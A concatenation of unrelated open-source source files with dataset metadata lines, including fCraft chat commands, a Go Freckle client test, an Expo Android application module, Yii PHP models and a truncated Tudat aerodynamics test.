                        // message counter so the ruse is not detectable.
                        player.Message( "Reply: Cannot send message; player {0}&S is offline.",
                                        PlayerDB.FindExactClassyName( targetName ) );
                        if( targetPlayer.CanHear( player ) ) {
                            Chat.SendPM( player, targetPlayer, messageText );
                            player.Info.DecrementMessageWritten();
                        }
                    }
                } else {
                    player.Message( "Reply: Cannot send message; player {0}&S is offline.",
                                    PlayerDB.FindExactClassyName( targetName ) );
                }
            } else {
                player.Message( "Reply: You have not sent any messages yet." );
            }
        }
#endregion
#region Say
        /// <summary> Descriptor for /Say (alias /broadcast). </summary>
        static readonly
            CommandDescriptor CdSay = new CommandDescriptor {
                Name = "Say",
                Aliases = new[] { "broadcast" },
                Category = CommandCategory.Chat,
                IsConsoleSafe = true,
                NotRepeatable = true,
                DisableLogging = true,
                UsableByFrozenPlayers = true,
                Permissions = new[] { Permission.Chat, Permission.Say },
                Usage = "/Say Message",
                Help = "Shows a message in special color, without the player name prefix. " +
                       "Can be used for making announcements.",
                Handler = SayHandler
            };
        /// <summary> Handles /Say: broadcasts an announcement without the
        /// sender's name prefix. Muted players and chat spam are rejected
        /// before the Say permission is checked. </summary>
        static void SayHandler( Player player, CommandReader cmd ) {
            if( player.Info.IsMuted ) {
                player.MessageMuted();
                return;
            }
            if( player.DetectChatSpam() ) return;
            if( player.Can( Permission.Say ) ) {
                string msg = cmd.NextAll().Trim( ' ' );
                if( msg.Length > 0 ) {
                    Chat.SendSay( player, msg );
                } else {
                    CdSay.PrintUsage( player );
                }
            } else {
                player.MessageNoAccess( Permission.Say );
            }
        }
#endregion
#region Staff
        /// <summary> Descriptor for /Staff (alias /st). </summary>
        static readonly CommandDescriptor CdStaff = new CommandDescriptor {
            Name = "Staff",
            Aliases = new[] { "st" },
            Category = CommandCategory.Chat | CommandCategory.Moderation,
            Permissions = new[] { Permission.Chat },
            NotRepeatable = true,
            IsConsoleSafe = true,
            DisableLogging = true,
            UsableByFrozenPlayers = true,
            Usage = "/Staff Message",
            Help = "Broadcasts your message to all operators/moderators on the server at once.",
            Handler = StaffHandler
        };
        /// <summary> Handles /Staff: relays a message to the staff channel.
        /// Empty messages are silently ignored. </summary>
        static void StaffHandler( Player player, CommandReader cmd ) {
            if( player.Info.IsMuted ) {
                player.MessageMuted();
                return;
            }
            if( player.DetectChatSpam() ) return;
            string message = cmd.NextAll().Trim( ' ' );
            if( message.Length > 0 ) {
                Chat.SendStaff( player, message );
            }
        }
#endregion
#region Ignore / Unignore
static readonly CommandDescriptor CdIgnore = new CommandDescriptor {
Name = "Ignore",
Category = CommandCategory.Chat,
IsConsoleSafe = true,
Usage = "/Ignore [PlayerName]",
Help = "Temporarily blocks the other player from messaging you. " +
"If no player name is given, lists all ignored players.",
Handler = IgnoreHandler
};
static void IgnoreHandler( Player player, CommandReader cmd ) {
string name = cmd.Next();
if( name != null ) {
if( cmd.HasNext ) {
// too many parameters given
CdIgnore.PrintUsage( player );
return;
}
// A name was given -- let's find the target
PlayerInfo targetInfo = PlayerDB.FindPlayerInfoOrPrintMatches( player, name, SearchOptions.ReturnSelfIfOnlyMatch );
if( targetInfo == null ) return;
if( targetInfo == player.Info ) {
player.Message( "You cannot &H/Ignore&S yourself." );
return;
}
if( player.Ignore( targetInfo ) ) {
player.MessageNow( "You are now ignoring {0}", targetInfo.ClassyName );
} else {
player.MessageNow( "You are already ignoring {0}", targetInfo.ClassyName );
}
} else {
ListIgnoredPlayers( player );
}
}
static readonly CommandDescriptor CdUnignore = new CommandDescriptor {
Name = "Unignore",
Category = CommandCategory.Chat,
IsConsoleSafe = true,
Usage = "/Unignore PlayerName",
Help = "Unblocks the other player from messaging you.",
Handler = UnignoreHandler
};
static void UnignoreHandler( Player player, CommandReader cmd ) {
string name = cmd.Next();
if( name != null ) {
if( cmd.HasNext ) {
// too many parameters given
CdUnignore.PrintUsage( player );
return;
}
// A name was given -- let's find the target
PlayerInfo targetInfo = PlayerDB.FindPlayerInfoOrPrintMatches( player, name, SearchOptions.ReturnSelfIfOnlyMatch );
if( targetInfo == null ) return;
if( targetInfo == player.Info ) {
player.Message( "You cannot &H/Ignore&S (or &H/Unignore&S) yourself." );
return;
}
if( player.Unignore( targetInfo ) ) {
player.MessageNow( "You are no longer ignoring {0}", targetInfo.ClassyName );
} else {
player.MessageNow( "You are not currently ignoring {0}", targetInfo.ClassyName );
}
} else {
ListIgnoredPlayers( player );
}
}
static void ListIgnoredPlayers( Player player ) {
PlayerInfo[] ignoreList = player.IgnoreList;
if( ignoreList.Length > 0 ) {
player.MessageNow( "Ignored players: {0}", ignoreList.JoinToClassyString() );
} else {
player.MessageNow( "You are not currently ignoring anyone." );
}
}
#endregion
#region Me
        /// <summary> Descriptor for /Me. </summary>
        static readonly CommandDescriptor CdMe = new CommandDescriptor {
            Name = "Me",
            Category = CommandCategory.Chat,
            Permissions = new[] { Permission.Chat },
            IsConsoleSafe = true,
            NotRepeatable = true,
            DisableLogging = true,
            UsableByFrozenPlayers = true,
            Usage = "/Me Message",
            Help = "Sends IRC-style action message prefixed with your name.",
            Handler = MeHandler
        };
        /// <summary> Handles /Me: sends an IRC-style action message
        /// ("* Name does something") after mute/spam checks. </summary>
        static void MeHandler( Player player, CommandReader cmd ) {
            if( player.Info.IsMuted ) {
                player.MessageMuted();
                return;
            }
            if( player.DetectChatSpam() ) return;
            string msg = cmd.NextAll().Trim( ' ' );
            if( msg.Length > 0 ) {
                Chat.SendMe( player, msg );
            } else {
                CdMe.PrintUsage( player );
            }
        }
#endregion
#region Roll
static readonly CommandDescriptor CdRoll = new CommandDescriptor {
Name = "Roll",
Category = CommandCategory.Chat,
Permissions = new[] { Permission.Chat },
IsConsoleSafe = true,
Help = "Gives random number between 1 and 100.\n" +
"&H/Roll MaxNumber\n" +
"&S Gives number between 1 and max.\n" +
"&H/Roll MinNumber MaxNumber\n" +
"&S Gives number between min and max.",
Handler = RollHandler
};
static void RollHandler( Player player, CommandReader cmd ) {
if( player.Info.IsMuted ) {
player.MessageMuted();
return;
}
if( player.DetectChatSpam() ) return;
Random rand = new Random();
int n1;
int min, max;
if( cmd.NextInt( out n1 ) ) {
int n2;
if( !cmd.NextInt( out n2 ) ) {
n2 = 1;
}
min = Math.Min( n1, n2 );
max = Math.Max( n1, n2 );
} else {
min = 1;
max = 100;
}
if( max == Int32.MaxValue - 1 ) {
player.Message( "Roll: Given values must be between {0} and {1}",
Int32.MinValue, Int32.MaxValue - 1 );
return;
}
int num = rand.Next( min, max + 1 );
Server.Message( player,
"{0}{1} rolled {2} ({3}...{4})",
player.ClassyName, Color.Silver, num, min, max );
player.Message( "{0}You rolled {1} ({2}...{3})",
Color.Silver, num, min, max );
}
#endregion
#region Deafen
        /// <summary> Descriptor for /Deafen (alias /deaf). </summary>
        static readonly CommandDescriptor CdDeafen = new CommandDescriptor {
            Name = "Deafen",
            Aliases = new[] { "deaf" },
            Category = CommandCategory.Chat,
            Help = "Blocks all chat messages from being sent to you.",
            Handler = DeafenHandler
        };
        /// <summary> Handles /Deafen: toggles the player's deafened state.
        /// When turning deafness ON, the screen is blanked first so no stale
        /// chat remains visible. Takes no arguments. </summary>
        static void DeafenHandler( Player player, CommandReader cmd ) {
            if( cmd.HasNext ) {
                CdDeafen.PrintUsage( player );
                return;
            }
            if( !player.IsDeaf ) {
                // Push the existing chat off-screen before going deaf.
                for( int i = 0; i < LinesToClear; i++ ) {
                    player.MessageNow( "" );
                }
                player.MessageNow( "Deafened mode: ON" );
                player.MessageNow( "You will not see ANY messages until you type &H/Deafen&S again." );
                player.IsDeaf = true;
            } else {
                player.IsDeaf = false;
                player.MessageNow( "Deafened mode: OFF" );
            }
        }
#endregion
#region Clear
        // Number of blank lines that fills the client's visible chat area.
        const int LinesToClear = 30;
        /// <summary> Descriptor for /Clear. </summary>
        static readonly CommandDescriptor CdClear = new CommandDescriptor {
            Name = "Clear",
            UsableByFrozenPlayers = true,
            Category = CommandCategory.Chat,
            Help = "Clears the chat screen.",
            Handler = ClearHandler
        };
        /// <summary> Handles /Clear: scrolls the chat off-screen by sending
        /// LinesToClear empty lines. Takes no arguments. </summary>
        static void ClearHandler( Player player, CommandReader cmd ) {
            if( cmd.HasNext ) {
                CdClear.PrintUsage( player );
                return;
            }
            for( int i = 0; i < LinesToClear; i++ ) {
                player.Message( "" );
            }
        }
#region Timer
static readonly CommandDescriptor CdTimer = new CommandDescriptor {
Name = "Timer",
Permissions = new[] { Permission.UseTimers },
IsConsoleSafe = true,
Category = CommandCategory.Chat,
Usage = "/Timer <Duration> <Message>",
Help = "Starts a timer with a given duration and message. " +
"As the timer counts down, announcements are shown globally. See also: &H/Help Timer Abort",
HelpSections = new Dictionary<string, string> {
{ "abort", "&H/Timer Abort <TimerID>\n&S" +
"Aborts a timer with the given ID number. " +
"To see a list of timers and their IDs, type &H/Timer&S (without any parameters)." }
},
Handler = TimerHandler
};
// Handler for "/Timer". Three modes, selected by the first parameter:
//   (none)        — list all running timers, soonest-to-expire first;
//   "abort <id>"  — cancel a running timer and announce the abort;
//   "<duration>"  — start a new timer with an optional trailing message.
static void TimerHandler( Player player, CommandReader cmd ) {
    string param = cmd.Next();

    // List timers
    if( param == null ) {
        ChatTimer[] list = ChatTimer.TimerList.OrderBy( timer => timer.TimeLeft ).ToArray();
        if( list.Length == 0 ) {
            player.Message( "No timers running." );
        } else {
            player.Message( "There are {0} timers running:", list.Length );
            foreach( ChatTimer timer in list ) {
                player.Message( " #{0} \"{1}&S\" (started by {2}, {3} left)",
                timer.ID, timer.Message, timer.StartedBy, timer.TimeLeft.ToMiniString() );
            }
        }
        return;
    }

    // Abort a timer
    if( param.Equals( "abort", StringComparison.OrdinalIgnoreCase ) ) {
        int timerId;
        if( cmd.NextInt( out timerId ) ) {
            ChatTimer timer = ChatTimer.FindTimerById( timerId );
            // Treat an already-finished timer the same as a nonexistent one.
            if( timer == null || !timer.IsRunning ) {
                player.Message( "Given timer (#{0}) does not exist.", timerId );
            } else {
                timer.Abort();
                // Announce globally so everyone knows the countdown stopped.
                string abortMsg = String.Format( "&Y(Timer) {0}&Y aborted a timer with {1} left: {2}",
                player.ClassyName, timer.TimeLeft.ToMiniString(), timer.Message );
                Chat.SendSay( player, abortMsg );
            }
        } else {
            CdTimer.PrintUsage( player );
        }
        return;
    }

    // Start a timer
    // Starting a timer produces chat output, so muted or chat-spamming
    // players are blocked here.
    if( player.Info.IsMuted ) {
        player.MessageMuted();
        return;
    }
    if( player.DetectChatSpam() ) return;

    // Parse and range-check the requested duration.
    TimeSpan duration;
    if( !param.TryParseMiniTimeSpan( out duration ) ) {
        CdTimer.PrintUsage( player );
        return;
    }
    if( duration > DateTimeUtil.MaxTimeSpan ) {
        player.MessageMaxTimeSpan();
        return;
    }
    if( duration < ChatTimer.MinDuration ) {
        player.Message( "Timer: Must be at least 1 second." );
        return;
    }

    // Announce the new timer; the trailing message text is optional.
    string sayMessage;
    string message = cmd.NextAll();
    if( String.IsNullOrEmpty( message ) ) {
        sayMessage = String.Format( "&Y(Timer) {0}&Y started a {1} timer",
        player.ClassyName,
        duration.ToMiniString() );
    } else {
        sayMessage = String.Format( "&Y(Timer) {0}&Y started a {1} timer: {2}",
        player.ClassyName,
        duration.ToMiniString(),
        message );
    }
    Chat.SendSay( player, sayMessage );
    ChatTimer.Start( duration, message, player.Name );
}
#endregion
}
} | 111WARLOCK111/Caznowl-Cube-Zombie | fCraft/Commands/ChatCommands.cs | C# | bsd-3-clause | 18,005 |
@javax.xml.bind.annotation.XmlSchema(namespace = "http://dto7.api.echosign", elementFormDefault = javax.xml.bind.annotation.XmlNsForm.QUALIFIED)
package echosign.api.clientv20.dto7;
| OBHITA/Consent2Share | ThirdParty/adobe-echosign-api/src/main/java/echosign/api/clientv20/dto7/package-info.java | Java | bsd-3-clause | 182 |
// Copyright 2014 - anova r&d bvba. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package freckle
import (
"fmt"
"net/http"
"net/http/httptest"
"testing"
"github.com/stretchr/testify/assert"
)
const domain = "mydomain"
const token = "abcdefghijklmnopqrstuvwxyz"
// letsTestFreckle builds a Freckle client pointed at the given test server,
// with debug logging switched on so request/response traffic is visible.
func letsTestFreckle(ts *httptest.Server) Freckle {
	client := LetsFreckle(domain, token)
	client.base = ts.URL
	client.Debug(true)
	return client
}
// authenticated wraps fn in an http.Handler that first asserts the incoming
// request uses the expected method and path and carries the Freckle
// authentication headers, then delegates to fn.
func authenticated(t *testing.T, method, path string, fn func(w http.ResponseWriter, r *http.Request)) http.Handler {
	check := func(w http.ResponseWriter, r *http.Request) {
		assert.Equal(t, method, r.Method, "Should have been HTTP "+method)
		assert.Equal(t, path, r.URL.Path, "Should have been HTTP URL "+path)
		headers := r.Header
		assert.Equal(t, domain, headers.Get("User-Agent"), "User-Agent header should have been set")
		assert.Equal(t, token, headers.Get("X-FreckleToken"), "X-FreckleToken header should have been set")
		fn(w, r)
	}
	return http.HandlerFunc(check)
}
func response(body string) func(http.ResponseWriter, *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintln(w, body)
}
}
func noContent() func(http.ResponseWriter, *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(204)
}
}
| gertv/go-freckle | freckle_test.go | GO | bsd-3-clause | 1,325 |
package expo.modules.application;
import android.app.Activity;
import android.content.Context;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.os.Build;
import android.os.RemoteException;
import android.provider.Settings;
import android.util.Log;
import com.android.installreferrer.api.InstallReferrerClient;
import com.android.installreferrer.api.InstallReferrerStateListener;
import com.android.installreferrer.api.ReferrerDetails;
import org.unimodules.core.ExportedModule;
import org.unimodules.core.ModuleRegistry;
import org.unimodules.core.Promise;
import org.unimodules.core.interfaces.ActivityProvider;
import org.unimodules.core.interfaces.ExpoMethod;
import org.unimodules.core.interfaces.RegistryLifecycleListener;
import java.util.HashMap;
import java.util.Map;
/**
 * Expo universal module exposing basic information about the host application
 * (name, package id, native version strings) plus install-time metadata queried
 * from the Android PackageManager and the Play Install Referrer library.
 */
public class ApplicationModule extends ExportedModule implements RegistryLifecycleListener {
  private static final String NAME = "ExpoApplication";
  private static final String TAG = ApplicationModule.class.getSimpleName();

  private ModuleRegistry mModuleRegistry;
  private Context mContext;
  private ActivityProvider mActivityProvider;
  private Activity mActivity;

  public ApplicationModule(Context context) {
    super(context);
    mContext = context;
  }

  @Override
  public String getName() {
    return NAME;
  }

  @Override
  public void onCreate(ModuleRegistry moduleRegistry) {
    mModuleRegistry = moduleRegistry;
    mActivityProvider = moduleRegistry.getModule(ActivityProvider.class);
    mActivity = mActivityProvider.getCurrentActivity();
  }

  /**
   * Constants exported to JS: application name/id, native version strings and
   * the device's ANDROID_ID. Version fields are omitted (with a log entry) if
   * the PackageManager cannot resolve our own package.
   */
  @Override
  public Map<String, Object> getConstants() {
    HashMap<String, Object> constants = new HashMap<>();
    String applicationName = mContext.getApplicationInfo().loadLabel(mContext.getPackageManager()).toString();
    String packageName = mContext.getPackageName();
    constants.put("applicationName", applicationName);
    constants.put("applicationId", packageName);

    PackageManager packageManager = mContext.getPackageManager();
    try {
      PackageInfo pInfo = packageManager.getPackageInfo(packageName, 0);
      constants.put("nativeApplicationVersion", pInfo.versionName);

      // Truncated to int for backwards compatibility with pre-API-28 version codes.
      int versionCode = (int)getLongVersionCode(pInfo);
      constants.put("nativeBuildVersion", Integer.toString(versionCode));
    } catch (PackageManager.NameNotFoundException e) {
      Log.e(TAG, "Exception: ", e);
    }

    constants.put("androidId", Settings.Secure.getString(mContext.getContentResolver(), Settings.Secure.ANDROID_ID));
    return constants;
  }

  /**
   * Resolves with this app's first-install time, in milliseconds since the epoch.
   * Rejects if the PackageManager cannot resolve our own package.
   */
  @ExpoMethod
  public void getInstallationTimeAsync(Promise promise) {
    PackageManager packageManager = mContext.getPackageManager();
    String packageName = mContext.getPackageName();
    try {
      PackageInfo info = packageManager.getPackageInfo(packageName, 0);
      promise.resolve((double)info.firstInstallTime);
    } catch (PackageManager.NameNotFoundException e) {
      Log.e(TAG, "Exception: ", e);
      promise.reject("ERR_APPLICATION_PACKAGE_NAME_NOT_FOUND", "Unable to get install time of this application. Could not get package info or package name.", e);
    }
  }

  /**
   * Resolves with this app's last-update time, in milliseconds since the epoch.
   * Rejects if the PackageManager cannot resolve our own package.
   */
  @ExpoMethod
  public void getLastUpdateTimeAsync(Promise promise) {
    PackageManager packageManager = mContext.getPackageManager();
    String packageName = mContext.getPackageName();
    try {
      PackageInfo info = packageManager.getPackageInfo(packageName, 0);
      promise.resolve((double)info.lastUpdateTime);
    } catch (PackageManager.NameNotFoundException e) {
      Log.e(TAG, "Exception: ", e);
      promise.reject("ERR_APPLICATION_PACKAGE_NAME_NOT_FOUND", "Unable to get last update time of this application. Could not get package info or package name.", e);
    }
  }

  /**
   * Queries the Play Install Referrer service asynchronously and settles the
   * promise with the referrer string, or rejects with a specific error code
   * for each failure mode of the referrer client.
   */
  @ExpoMethod
  public void getInstallReferrerAsync(final Promise promise) {
    final StringBuilder installReferrer = new StringBuilder();

    final InstallReferrerClient referrerClient;
    referrerClient = InstallReferrerClient.newBuilder(mContext).build();

    referrerClient.startConnection(new InstallReferrerStateListener() {
      @Override
      public void onInstallReferrerSetupFinished(int responseCode) {
        switch (responseCode) {
          case InstallReferrerClient.InstallReferrerResponse.OK:
            // Connection established and response received
            try {
              ReferrerDetails response = referrerClient.getInstallReferrer();
              installReferrer.append(response.getInstallReferrer());
            } catch (RemoteException e) {
              Log.e(TAG, "Exception: ", e);
              promise.reject("ERR_APPLICATION_INSTALL_REFERRER_REMOTE_EXCEPTION", "RemoteException getting install referrer information. This may happen if the process hosting the remote object is no longer available.", e);
              // Bug fix: previously execution fell through to promise.resolve()
              // below, settling the promise a second time after it had already
              // been rejected. Close the connection and stop here instead.
              referrerClient.endConnection();
              return;
            }
            promise.resolve(installReferrer.toString());
            break;
          case InstallReferrerClient.InstallReferrerResponse.FEATURE_NOT_SUPPORTED:
            // API not available in the current Play Store app
            promise.reject("ERR_APPLICATION_INSTALL_REFERRER_UNAVAILABLE", "The current Play Store app doesn't provide the installation referrer API, or the Play Store may not be installed.");
            break;
          case InstallReferrerClient.InstallReferrerResponse.SERVICE_UNAVAILABLE:
            // Connection could not be established
            promise.reject("ERR_APPLICATION_INSTALL_REFERRER_CONNECTION", "Could not establish a connection to Google Play");
            break;
          default:
            promise.reject("ERR_APPLICATION_INSTALL_REFERRER", "General error retrieving the install referrer: response code " + responseCode);
        }

        referrerClient.endConnection();
      }

      @Override
      public void onInstallReferrerServiceDisconnected() {
        promise.reject("ERR_APPLICATION_INSTALL_REFERRER_SERVICE_DISCONNECTED", "Connection to install referrer service was lost.");
      }
    });
  }

  // Returns the package's version code, using the long-valued API on API 28+
  // and the legacy int field on older platforms.
  private static long getLongVersionCode(PackageInfo info) {
    if (Build.VERSION.SDK_INT >= 28) {
      return info.getLongVersionCode();
    }
    return info.versionCode;
  }
}
| exponent/exponent | packages/expo-application/android/src/main/java/expo/modules/application/ApplicationModule.java | Java | bsd-3-clause | 6,171 |
#include <test/unit/math/test_ad.hpp>
TEST(MathMixMatFun, subRow) {
  // Factory binding the (row, col, length) arguments of sub_row, so the
  // autodiff tester can vary only the matrix argument.
  auto make_sub_row = [](int row, int col, int len) {
    return
        [=](const auto& m) { return stan::math::sub_row(m, row, col, len); };
  };

  // 1x1 matrix: zero- and one-element sub-rows.
  Eigen::MatrixXd m11(1, 1);
  m11 << 3.2;
  stan::test::expect_ad(make_sub_row(1, 1, 0), m11);
  stan::test::expect_ad(make_sub_row(1, 1, 1), m11);

  // 3x4 matrix: in-range extractions followed by out-of-range cases,
  // which are expected to throw consistently across autodiff types.
  Eigen::MatrixXd m34(3, 4);
  m34 << 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12;
  stan::test::expect_ad(make_sub_row(1, 1, 0), m34);
  stan::test::expect_ad(make_sub_row(1, 1, 1), m34);
  stan::test::expect_ad(make_sub_row(1, 1, 3), m34);
  stan::test::expect_ad(make_sub_row(1, 2, 2), m34);
  stan::test::expect_ad(make_sub_row(3, 4, 1), m34);
  stan::test::expect_ad(make_sub_row(2, 3, 2), m34);
  stan::test::expect_ad(make_sub_row(1, 1, 7), m34);  // exception--range
  stan::test::expect_ad(make_sub_row(7, 1, 1), m34);  // exception--range
  stan::test::expect_ad(make_sub_row(1, 7, 1), m34);  // exception--range

  // Empty matrix: every index combination is an edge case.
  Eigen::MatrixXd m00(0, 0);
  stan::test::expect_ad(make_sub_row(0, 0, 0), m00);
  stan::test::expect_ad(make_sub_row(0, 1, 0), m00);
  stan::test::expect_ad(make_sub_row(0, 1, 1), m00);
  stan::test::expect_ad(make_sub_row(1, 0, 0), m00);
  stan::test::expect_ad(make_sub_row(1, 0, 1), m00);
  stan::test::expect_ad(make_sub_row(1, 1, 0), m00);
  stan::test::expect_ad(make_sub_row(1, 1, 1), m00);
}
| stan-dev/math | test/unit/math/mix/fun/sub_row_test.cpp | C++ | bsd-3-clause | 1,112 |
/* @flow */
'use strict';
import { document } from '../dom/dom';
export default function () : boolean {
return Boolean(
(document) &&
(typeof document.querySelector !== 'undefined')
);
}
| cinecove/defunctr | lib/checks/hasQuerySelectorCheck.js | JavaScript | bsd-3-clause | 201 |
<?php
namespace backend\models;
use Yii;
use yii\base\Model;
use yii\data\ActiveDataProvider;
use backend\models\TaxonomyItems;
/**
 * TaxonomyItemsSearch represents the model behind the search form about
 * `backend\models\TaxonomyItems`.
 */
class TaxonomyItemsSearch extends TaxonomyItems
{
    /**
     * @inheritdoc
     */
    public function rules()
    {
        return [
            [['vid'], 'required'],
            [['id', 'vid', 'pid'], 'integer'],
            [['name'], 'safe'],
        ];
    }

    /**
     * @inheritdoc
     */
    public function scenarios()
    {
        // bypass scenarios() implementation in the parent class
        return Model::scenarios();
    }

    /**
     * Creates data provider instance with search query applied.
     *
     * @param array $params request parameters, typically
     *   Yii::$app->request->queryParams
     *
     * @return ActiveDataProvider
     */
    public function search($params)
    {
        $query = TaxonomyItems::find();

        $dataProvider = new ActiveDataProvider([
            'query' => $query,
        ]);

        if (!($this->load($params) && $this->validate())) {
            // No filter input or invalid input: return the unfiltered provider.
            return $dataProvider;
        }

        // Exact-match filters on integer columns.
        // Fix: `pid` is declared in rules() but was previously never applied
        // to the query, so filtering by parent id silently did nothing.
        $query->andFilterWhere([
            'id' => $this->id,
            'vid' => $this->vid,
            'pid' => $this->pid,
        ]);

        // Partial (LIKE) match on the item name.
        $query->andFilterWhere(['like', 'name', $this->name]);

        return $dataProvider;
    }
}
| babagay/razzd | backend/models/TaxonomyItemsSearch.php | PHP | bsd-3-clause | 1,352 |
# proxy module
from pyface.ui.wx.system_metrics import *
| enthought/etsproxy | enthought/pyface/ui/wx/system_metrics.py | Python | bsd-3-clause | 57 |
#ifndef __ISOLATION_MODULE_HPP__
#define __ISOLATION_MODULE_HPP__
#include <string>
namespace mesos { namespace internal { namespace slave {
class Framework;
class Slave;
// Abstract interface for executor isolation back-ends. Concrete modules are
// produced by the create() factory and torn down with destroy().
class IsolationModule {
public:
  // Factory: instantiates a concrete isolation module of the given type.
  static IsolationModule * create(const std::string &type);

  // Disposes of a module previously returned by create().
  static void destroy(IsolationModule *module);

  virtual ~IsolationModule() {}

  // Called during slave initialization.
  virtual void initialize(Slave *slave) {}

  // Called by the slave to launch an executor for a given framework.
  virtual void startExecutor(Framework *framework) = 0;

  // Terminate a framework's executor, if it is still running.
  // The executor is expected to be gone after this method exits.
  virtual void killExecutor(Framework *framework) = 0;

  // Update the resource limits for a given framework. This method will
  // be called only after an executor for the framework is started.
  virtual void resourcesChanged(Framework *framework) {}
};
}}}
#endif /* __ISOLATION_MODULE_HPP__ */
| benh/twesos | src/slave/isolation_module.hpp | C++ | bsd-3-clause | 992 |
<?php
namespace frontend\models\money;
use Yii;
/**
 * This is the model class for table "fin_quota".
 *
 * Column semantics below are inferred from names only — confirm against the
 * schema before relying on them:
 *
 * @property integer $quota_id     primary key
 * @property integer $user_id      owner of the quota record
 * @property string $quota_amount  quota value (decimal in the database)
 * @property string $quota_desc    free-text description, max 80 chars
 * @property integer $quota_status status flag (values defined by callers)
 * @property integer $addtime      creation time, presumably a unix timestamp
 */
class Quota extends \yii\db\ActiveRecord
{
    /**
     * @inheritdoc
     */
    public static function tableName()
    {
        return 'fin_quota';
    }

    /**
     * @inheritdoc
     */
    public function rules()
    {
        return [
            [['user_id', 'quota_status', 'addtime'], 'integer'],
            [['quota_amount'], 'number'],
            [['quota_desc'], 'string', 'max' => 80]
        ];
    }

    /**
     * @inheritdoc
     */
    public function attributeLabels()
    {
        return [
            'quota_id' => 'Quota ID',
            'user_id' => 'User ID',
            'quota_amount' => 'Quota Amount',
            'quota_desc' => 'Quota Desc',
            'quota_status' => 'Quota Status',
            'addtime' => 'Addtime',
        ];
    }
}
| wangpengzhen/web | frontend/models/money/Quota.php | PHP | bsd-3-clause | 1,084 |
/* Copyright (c) 2010-2018, Delft University of Technology
* All rigths reserved
*
* This file is part of the Tudat. Redistribution and use in source and
* binary forms, with or without modification, are permitted exclusively
* under the terms of the Modified BSD license. You should have received
* a copy of the license with this file. If not, please or visit:
* http://tudat.tudelft.nl/LICENSE.
*/
#define BOOST_TEST_MAIN
#include <boost/array.hpp>
#include <boost/make_shared.hpp>
#include <memory>
#include <boost/test/floating_point_comparison.hpp>
#include <boost/test/unit_test.hpp>
#include <Eigen/Core>
#include "Tudat/Mathematics/BasicMathematics/mathematicalConstants.h"
#include "Tudat/Astrodynamics/Aerodynamics/hypersonicLocalInclinationAnalysis.h"
#include "Tudat/Astrodynamics/Aerodynamics/customAerodynamicCoefficientInterface.h"
#include "Tudat/Basics/basicTypedefs.h"
#include "Tudat/Mathematics/GeometricShapes/capsule.h"
#include "Tudat/Mathematics/GeometricShapes/sphereSegment.h"
#include "Tudat/SimulationSetup/tudatSimulationHeader.h"
#include "Tudat/Astrodynamics/Aerodynamics/UnitTests/testApolloCapsuleCoefficients.h"
namespace tudat
{
namespace unit_tests
{
//! Dummy class used to test the use of control surface deflections in numerical propagation.
//! In this class, a single control surface named "TestSurface" is set to a time-dependent deflection at each time step,
//! as is the angle of attack. The update is performed by the AerodynamicAngleCalculator, as linked by this class'
//! constructor.
class DummyGuidanceSystem
{
public:

    //! Constructor: registers this object's angle-of-attack getter and its
    //! time-update callback with the angle calculator, then applies an initial
    //! 0.2 rad deflection to "TestSurface".
    DummyGuidanceSystem(
            const std::function< void( const std::string&, const double ) > controlSurfaceFunction,
            const std::shared_ptr< reference_frames::AerodynamicAngleCalculator > angleCalculator ):
        controlSurfaceFunction_( controlSurfaceFunction ), angleCalculator_( angleCalculator ),
        currentAngleOfAttack_( 0.0 ), currentSurfaceDeflection_( 0.0 )
    {
        // Only the angle of attack is driven here; the sideslip and bank angle
        // slots are left as empty functions. The final argument is the update
        // callback, invoked with the current time at every angle update.
        angleCalculator_->setOrientationAngleFunctions(
                    std::bind( &DummyGuidanceSystem::getCurrentAngleOfAttack, this ),
                    std::function< double( ) >( ),
                    std::function< double( ) >( ),
                    std::bind( &DummyGuidanceSystem::updateGuidance, this, std::placeholders::_1 ) );

        controlSurfaceFunction_( "TestSurface", 0.2 );
    }

    ~DummyGuidanceSystem( ){ }

    //! Time-update callback: angle of attack decreases linearly from 0.3 rad at
    //! t = 0 to 0 at t = 1000 s; the surface deflection increases linearly from
    //! -0.02 rad to +0.02 rad over the same interval, and is pushed to the
    //! vehicle via controlSurfaceFunction_.
    void updateGuidance( const double currentTime )
    {
        currentAngleOfAttack_ = 0.3 * ( 1.0 - currentTime / 1000.0 );
        currentSurfaceDeflection_ = -0.02 + 0.04 * currentTime / 1000.0;
        controlSurfaceFunction_( "TestSurface", currentSurfaceDeflection_ );
    }

    //! Returns the most recently computed angle of attack (rad).
    double getCurrentAngleOfAttack( )
    {
        return currentAngleOfAttack_;
    }

    //! Returns the most recently computed control surface deflection (rad).
    double getCurrentSurfaceDeflection( )
    {
        return currentSurfaceDeflection_;
    }

private:

    // Callback that sets a named control surface's deflection on the vehicle.
    std::function< void( const std::string&, const double ) > controlSurfaceFunction_;

    // Angle calculator with which this guidance object is registered.
    std::shared_ptr< reference_frames::AerodynamicAngleCalculator > angleCalculator_;

    double currentAngleOfAttack_;

    double currentSurfaceDeflection_;
};
using Eigen::Vector6d;
using mathematical_constants::PI;
BOOST_AUTO_TEST_SUITE( test_control_surface_increments )
//! Function to return dummy control increments as a function of 2 independent
//! variables. Each entry of a fixed base vector is scaled by a linear
//! combination of the two independent variables (angle of attack and control
//! surface deflection), yielding a deterministic, input-dependent increment.
Eigen::Vector6d dummyControlIncrements(
        const std::vector< double > independentVariables )
{
    // Verify the expected number of independent variables before they are
    // accessed. Fix: this check previously ran only after the at( ) calls
    // below, so a wrongly sized input would throw before the check could
    // ever report a failure.
    BOOST_CHECK_EQUAL( independentVariables.size( ), 2 );

    Eigen::Vector6d randomControlIncrements =
            ( Eigen::Vector6d( ) << 1.0, -3.5, 2.1, 0.4, -0.75, 1.3 ).finished( );
    for( unsigned int i = 0; i < 6; i++ )
    {
        randomControlIncrements( i ) *= (
                    0.01 * independentVariables.at( 0 ) + static_cast< double >( i ) * 0.005 * independentVariables.at( 1 ) );
    }

    return randomControlIncrements;
}
//! Test update and retrieval of control surface aerodynamic coefficient increments, outside of the numerical propagation.
//! Strategy: build two identical Apollo coefficient interfaces, attach the dummy
//! control surface increments to one of them, and check over a grid of angles
//! that (with increments) - (without increments) equals the dummy increment.
BOOST_AUTO_TEST_CASE( testControlSurfaceIncrementInterface )
{
    // Create aerodynamic coefficient interface without control increments.
